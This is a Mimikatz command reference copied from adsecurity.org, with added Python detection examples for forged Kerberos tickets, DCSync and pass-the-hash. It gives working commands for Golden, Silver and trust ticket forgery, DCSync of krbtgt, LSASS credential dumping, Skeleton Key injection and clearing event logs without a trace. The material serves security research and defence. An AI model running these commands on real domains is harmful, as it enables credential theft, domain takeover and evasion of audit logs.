The content of this page was copied from adsecurity.org.
Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory.
In order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, value "UseLogonCredential" (DWORD)
Windows Server 2012 R2 and Windows 8.1 include a new feature called LSA Protection, which involves running LSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass this with a driver, but that should make some noise in the event logs):
The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages.
Enabling LSA protection:
LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (“!+”).
EVENT::Clear – Clear an event log
EVENT::Drop – (experimental) Patch Events service to avoid new events
Note:
Run privilege::debug then event::drop to patch the event log. Then run Event::Clear to clear the event log without any log cleared event (1102) being logged.
A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.
A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.
Mimikatz Golden Ticket Command Reference:
The Mimikatz command to create a golden ticket is “kerberos::golden”
Golden Ticket Default Groups:
.\mimikatz "kerberos::golden /User:Administrator /domain:rd.lab.adsecurity.org /id:512 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
A Silver Ticket is a TGS (similar to TGT in format) using the target service account’s (identified by SPN mapping) NTLM password hash to encrypt and sign.
Example Mimikatz Command to Create a Silver Ticket:
The following Mimikatz command creates a Silver Ticket for the CIFS service on the server adsmswin2k8r2.lab.adsecurity.org. In order for this Silver Ticket to be successfully created, the AD computer account password hash for adsmswin2k8r2.lab.adsecurity.org needs to be discovered, either from an AD domain dump or by running Mimikatz on the local system as shown above (Mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit). The NTLM password hash is used with the /rc4 parameter. The service SPN type also needs to be identified in the /service parameter. Finally, the target computer’s fully-qualified domain name needs to be provided in the /target parameter. Don’t forget the domain SID in the /sid parameter.
mimikatz "kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt" exit
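Both forged-ticket types above leave a correlation gap in the audit trail: a Golden Ticket produces service-ticket requests (4769) for an account that no domain controller issued a TGT (4768) to, and a Silver Ticket produces a Kerberos logon (4624) on the target host that no domain controller ever issued a 4769 for. The following added detection example is not part of the original adsecurity.org material; the event records, host names, account names and the KNOWN_ACCOUNTS directory export are constructed for illustration.

```python
"""Correlate DC Kerberos audit events (4768 TGT issued, 4769 service ticket
issued) with Kerberos logons accepted on member servers (4624) to surface the
Golden and Silver Ticket patterns. Events are constructed samples, not logs."""
from collections import defaultdict

# Constructed DC-side events. 'service' is the 4769 ServiceName field, which for
# a host service is the computer account (e.g. FS01$).
DC_EVENTS = [
    {"id": 4768, "account": "alice"},
    {"id": 4769, "account": "alice", "service": "FS01$"},
    # Golden Ticket pattern: service ticket requested with a TGT no DC issued.
    {"id": 4769, "account": "DarthVader", "service": "FS01$"},
]
# Constructed member-server events: 4624 with AuthenticationPackage Kerberos.
HOST_EVENTS = [
    {"id": 4624, "host": "FS01", "account": "alice", "package": "Kerberos"},
    {"id": 4624, "host": "FS01", "account": "DarthVader", "package": "Kerberos"},
    # Silver Ticket pattern: host accepted a ticket no DC ever issued (no 4769).
    {"id": 4624, "host": "ADSMSWIN2K8R2", "account": "LukeSkywalker", "package": "Kerberos"},
]
KNOWN_ACCOUNTS = {"alice", "lukeskywalker"}  # constructed directory export


def detect_forged_tickets(dc_events, host_events, known_accounts):
    """Return (finding, account, detail) tuples. Assumes dc_events is the union
    of all DCs' logs over at least the maximum ticket lifetime (10h TGT, 7d
    renewal by default, which /endin:600 /renewmax:10080 above mirror)."""
    tgt_accounts = {e["account"].lower() for e in dc_events if e["id"] == 4768}
    tgs_hosts = defaultdict(set)  # account -> hosts it holds service tickets for
    for e in dc_events:
        if e["id"] == 4769:
            tgs_hosts[e["account"].lower()].add(e["service"].rstrip("$").lower())
    findings = []
    for acct, hosts in tgs_hosts.items():
        if acct not in tgt_accounts:
            findings.append(("golden_ticket_suspect", acct, sorted(hosts)))
        if acct not in known_accounts:
            # A forged ticket may name a user that does not exist in the directory.
            findings.append(("nonexistent_account", acct, sorted(hosts)))
    for e in host_events:
        if e["id"] != 4624 or e["package"] != "Kerberos":
            continue
        acct, host = e["account"].lower(), e["host"].lower()
        if host not in tgs_hosts.get(acct, set()):
            findings.append(("silver_ticket_suspect", acct, host))
    return findings


if __name__ == "__main__":
    for f in detect_forged_tickets(DC_EVENTS, HOST_EVENTS, KNOWN_ACCOUNTS):
        print(f)
```

Because legitimate TGTs live for hours and renew for days, the correlation window must cover the full ticket lifetime and every DC's log, or normal users will be flagged.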
Once the Active Directory trust password hash is determined, a trust ticket can be generated. Trust tickets are created using the shared password between two domains that trust each other.
More background on Trust Tickets.
Dumping trust passwords (trust keys)
Mimikatz "privilege::debug" "lsadump::trust /patch" exit
Create a forged trust ticket (inter-realm TGT) using Mimikatz
Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging SIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust.
Mimikatz "kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi" exit
Trust Ticket Specific Required Parameters:
KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.
Similar to functionality of “klist”.
KERBEROS::PTC – pass the cache (NT6)
*Nix systems like Mac OS, Linux, BSD, Unix, etc. cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.
A good example of Mimikatz’s kerberos::ptc is when exploiting MS14-068 with PyKEK. PyKEK generates a ccache file which can be injected with Mimikatz using kerberos::ptc.
KERBEROS::PTT – pass the ticket
After a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required.
Similar to SEKURLSA::PTH (Pass-The-Hash).
KERBEROS::Purge – purge all Kerberos tickets
Similar to functionality of “klist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used.
KERBEROS::TGT – get current TGT for current user.
LSADUMP::DCShadow – Register the current machine as a DC to gain the ability to create new objects inside the DC (persistence method).
This requires full AD admin rights or KRBTGT pw hash.
DCShadow temporarily sets the computer to be a “DC” for the purposes of replication:
LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account)
Requires membership in Domain Admins or the domain Administrators group, or custom delegation.
A major feature added to Mimikatz in August 2015 is “DCSync”, which effectively “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller.
DCSync Options:
There’s also a /guid parameter.
DCSync Command Examples:
Pull password data for the KRBTGT user account in the rd.adsecurity.org domain:
Mimikatz "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt" exit
Pull password data for the Administrator user account in the rd.adsecurity.org domain:
Mimikatz "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit
Pull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain:
Mimikatz "lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$" exit
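Because DCSync asks a DC to replicate an object, the DC records a 4662 directory-service access event whose Properties carry the replication control-access GUIDs; only domain controllers (and a few known directory-sync services) should ever exercise them. The following added detection example is not part of the original adsecurity.org material; the 4662 records, the svc-backup and alice accounts and the placeholder GUID in the benign event are constructed, while the two DS-Replication GUIDs are the well-known AD schema values.

```python
"""Flag DCSync-style replication: Event 4662 on a domain controller whose
Properties carry the directory-replication control-access GUIDs, raised by a
principal that is not itself a domain controller. Sample events are constructed."""
import re

# Well-known control-access right GUIDs that a replication (DCSync) request needs.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed 4662 records using the Security log field names.
EVENTS = [
    # Normal DC-to-DC replication by a domain controller computer account.
    {"EventID": 4662, "SubjectUserName": "ADSDC03$", "ObjectType": "domainDNS",
     "AccessMask": "0x100", "Properties": "{%s}" % DS_REPL_GET_CHANGES_ALL},
    # Replication rights exercised by an ordinary account: the DCSync pattern.
    {"EventID": 4662, "SubjectUserName": "svc-backup", "ObjectType": "domainDNS",
     "AccessMask": "0x100",
     "Properties": "{%s} {%s}" % (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL)},
    # Unrelated property access on a user object (benign noise, placeholder GUID).
    {"EventID": 4662, "SubjectUserName": "alice", "ObjectType": "user",
     "AccessMask": "0x10", "Properties": "{11111111-2222-3333-4444-555555555555}"},
]


def detect_dcsync(events, dc_accounts, allowlist=()):
    """Return (subject, matched GUIDs) for replication requests not made by a DC.
    dc_accounts: computer accounts of the DCs (e.g. ADSDC03$); allowlist: known
    non-DC replicators such as a directory-synchronisation service account."""
    expected = {a.lower() for a in dc_accounts} | {a.lower() for a in allowlist}
    hits = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(e.get("Properties", ""))}
        matched = guids & REPL_GUIDS
        if matched and e["SubjectUserName"].lower() not in expected:
            hits.append((e["SubjectUserName"], sorted(matched)))
    return hits


if __name__ == "__main__":
    for subject, guids in detect_dcsync(EVENTS, ["ADSDC03$"]):
        print(f"DCSync suspect: {subject} exercised {', '.join(guids)}")
```

Auditing of directory service access must be enabled on the DCs for 4662 to be written at all; the allowlist is where a legitimate directory-synchronisation account goes rather than disabling the check.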
LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use /patch for a subset of data, use /inject for everything. Requires System or Debug rights.
Often service accounts are members of Domain Admins (or equivalent), or a Domain Admin was recently logged on to the computer an attacker dumps credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash, which is used to create Kerberos Golden Tickets.
mimikatz lsadump::lsa /inject exit
LSADUMP::NetSync
NetSync provides a simple way to use a DC computer account’s password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account’s information, including the password data.
LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.
LSADUMP::Secrets – get the SysKey to decrypt SECRETS entries (from registry or hives).
LSADUMP::SetNTLM – Ask a server to set a new password/ntlm for one user.
LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).
MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller.
"privilege::debug" "misc::skeleton"
PRIVILEGE::Backup – get backup privilege/rights. Requires Debug rights.
PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands).
SEKURLSA::Credman – List Credentials Manager
SEKURLSA::Ekeys – list Kerberos encryption keys
SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account)
SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT) password data
SEKURLSA::SSP – Lists SSP credentials
SEKURLSA::Wdigest – List WDigest credentials
SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials.
SEKURLSA::Minidump – switch to LSASS minidump process context (read lsass dump)
SEKURLSA::Pth – Pass-the-Hash and Over-Pass-the-Hash (aka pass the key).
Mimikatz can perform the well-known ‘Pass-The-Hash’ operation to run a process under another user’s credentials using the NTLM hash of that user’s password instead of the real password. For this, it starts a process with a fake identity, then replaces the fake information (NTLM hash of the fake password) with the real information (NTLM hash of the real password).
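The process started this way has the caller's local identity but different network credentials, which Windows records as a 4624 logon of type 9 (NewCredentials) from the logon process "seclogo" with the Negotiate package; runas /netonly produces the same shape, so the check below carries an allowlist for known cases. This added detection example is not part of the original adsecurity.org material; the 4624 records and the bob, helpdesk1 and helpdesk1-adm accounts are constructed.

```python
"""Flag logons that match the sekurlsa::pth footprint: Event 4624 with
LogonType 9 (NewCredentials), LogonProcessName "seclogo" and
AuthenticationPackageName "Negotiate". Sample events are constructed."""

# Constructed 4624 records (Security log field names; the TargetOutbound* fields
# exist on Windows 10 / Server 2016 and later and carry the "new" credentials).
EVENTS = [
    # Over-pass-the-hash shape: local user bob, outbound identity Administrator.
    {"EventID": 4624, "LogonType": 9, "LogonProcessName": "seclogo",
     "AuthenticationPackageName": "Negotiate", "SubjectUserName": "bob",
     "TargetOutboundUserName": "Administrator", "TargetOutboundDomainName": "LAB"},
    # runas /netonly produces the same shape; the allowlist handles known cases.
    {"EventID": 4624, "LogonType": 9, "LogonProcessName": "seclogo",
     "AuthenticationPackageName": "Negotiate", "SubjectUserName": "helpdesk1",
     "TargetOutboundUserName": "helpdesk1-adm", "TargetOutboundDomainName": "LAB"},
    # Interactive console logon: not relevant to this check.
    {"EventID": 4624, "LogonType": 2, "LogonProcessName": "User32",
     "AuthenticationPackageName": "Negotiate", "SubjectUserName": "-",
     "TargetOutboundUserName": "-", "TargetOutboundDomainName": "-"},
]


def is_pth_shape(e):
    """True when a 4624 carries the NewCredentials + seclogo + Negotiate triple."""
    return (e.get("EventID") == 4624 and e.get("LogonType") == 9
            and e.get("LogonProcessName", "").lower() == "seclogo"
            and e.get("AuthenticationPackageName", "").lower() == "negotiate")


def detect_pth(events, allowed_pairs=()):
    """Return (subject, outbound identity) for suspicious NewCredentials logons.
    allowed_pairs: (subject, DOMAIN\\user) pairs known to come from runas /netonly."""
    allowed = {(s.lower(), o.lower()) for s, o in allowed_pairs}
    hits = []
    for e in events:
        if not is_pth_shape(e):
            continue
        subject = e.get("SubjectUserName", "")
        outbound = e.get("TargetOutboundDomainName", "") + "\\" + e.get("TargetOutboundUserName", "")
        if (subject.lower(), outbound.lower()) in allowed:
            continue
        hits.append((subject, outbound))
    return hits


if __name__ == "__main__":
    for subject, outbound in detect_pth(EVENTS, [("helpdesk1", "LAB\\helpdesk1-adm")]):
        print(f"NewCredentials logon suspect: {subject} now using {outbound}")
```

A hit whose outbound identity is a privileged account, or whose subject has no business using runas /netonly, is the one to triage first.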
SEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account.
Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of other sessions (users).
Similar to credential dumping from LSASS, using the sekurlsa module, an attacker can get all Kerberos ticket data in memory on a system, including those belonging to an admin or service.
This is extremely useful if an attacker has compromised a web server configured for Kerberos delegation that users access with a backend SQL server. This enables an attacker to capture and reuse all user tickets in memory on that server.
The “kerberos::tickets” mimikatz command dumps the current logged-on user’s Kerberos tickets and does not require elevated rights. Leveraging the sekurlsa module’s capability to read from protected memory (LSASS), all Kerberos tickets on the system can be dumped.
Command: mimikatz sekurlsa::tickets exit
The Mimikatz SID module replaces MISC::AddSID. Use SID::Patch to patch the ntds service.
SID::add – Add a SID to SIDHistory of an object
SID::modify – Modify object SID of an object
The Mimikatz Token module enables Mimikatz to interact with Windows authentication tokens, including grabbing and impersonating existing tokens.
TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box using the Windows API.
Requires Administrator rights.
Find a domain admin credential on the box and use that token: token::elevate /domainadmin
TOKEN::List – list all tokens of the system
TS::MultiRDP – (experimental) Patch Terminal Server service to allow multiple users
TS::Sessions – List TS/RDP sessions.